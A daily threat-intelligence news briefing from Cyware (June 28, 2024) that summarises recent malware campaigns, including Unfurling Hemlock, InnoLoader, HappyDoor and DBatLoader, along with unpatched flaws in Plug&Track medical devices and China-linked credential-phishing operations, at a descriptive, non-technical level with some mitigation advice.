Cyware Daily Threat Intelligence
Daily Threat Briefing • Jun 28, 2024
We use cookies to improve your experience. Do you accept?
Daily Threat Briefing • Jun 28, 2024
In a sinister ballet of cyber subterfuge, Unfurling Hemlock unleashed “malware cluster bombs,” each detonating in digital havoc. Over 50,000 payloads have infiltrated systems globally, especially in the U.S., Germany, Russia, Turkey, India, and Canada.
Amidst this onslaught, vulnerabilities in the Sensor Net Connect device and Thermoscan IP desktop application could grant users administrator powers, jeopardizing medical data and enabling denial of service attacks. The vendor, Plug&Track, is yet to respond with fixes.
Meanwhile, China-sponsored operatives launched three sophisticated credential-phishing campaigns that have compromised over 40,000 corporate users.
Unfurling Hemlock unfurls malware
The Unfurling Hemlock threat actor is using a malware cluster bomb technique to deliver multiple types of malware to compromised systems, providing high levels of redundancy and persistence. Over 50,000 cluster bomb files linked to the threat group have been identified, with the attacks targeting systems primarily in the U.S., as well as in Germany, Russia, Turkey, India, and Canada. The attacks begin with the execution of a file named 'WEXTRACT.EXE', which contains nested compressed cabinet files, each containing a malware sample. The final stage executes the extracted files in reverse order.
New InnoSetup malware
A new type of malware disguised as cracks and commercial tools is being distributed, where a unique malware is created upon each download attempt with different hash values but the same malicious functions. The malware is created using InnoSetup and is dubbed InnoLoader. It displays an installer UI and executes malicious behaviors when the user clicks the "Next" button during installation. The malware can download and execute various payloads from the C2 server, including infostealers, proxy tools, and adware.
HappyDoor malware in email attacks
North Korean hackers are actively using the HappyDoor malware in spear-phishing email attacks to steal sensitive information and gain remote access. HappyDoor is a malware used by the Kimsuky group, a North Korean hacking group, since 2021 and is still active as of 2024. The evolving HappyDoor malware operates via regsvr32.exe in three stages and has functions such as screen capture, key logging, file leakage, and communication with C&C servers using HTTP.
DBatLoader spread via CMD files
ASEC discovered a malware downloader called DBatLoader (ModiLoader) being distributed through CMD files. The malware is obfuscated and contains a Base64-encoded EXE file. When executed, it uses default Windows programs to save and decode files before running as DBatLoader. The malware is distributed in phishing emails, and precautions such as being cautious with unknown emails, updating anti-malware programs, operating systems, and internet browsers are recommended for prevention.
Bug in Sensor Net Connect and Thermoscan IP
Vulnerabilities discovered in the Sensor Net Connect device and Thermoscan IP desktop application could allow a non-administrator user to gain administrator privileges, potentially compromising medical data systems. These vulnerabilities could lead to denial-of-service attacks on the medical monitoring infrastructure. The vendor, Plug&Track, has not responded to the researchers' attempts to disclose the vulnerabilities, so no official patch has been provided. Recommended mitigation steps include segregating access, monitoring logs and accounts, and implementing strict access controls until a permanent fix is available.
China-sponsored credential phishing attacks
China-sponsored threat actors have launched three novel credential-phishing campaigns that have compromised at least 40,000 corporate users, including top-level executives, in just 90 days. The campaigns, named LegalQloud, Eqooqp, and Boomer, target a range of industries and enter corporate environments through browsers. The campaigns use HEAT attack techniques, including bypassing MFA, using phishing kits and AitM tactics, impersonating entities like Microsoft, and using dynamic phishing links.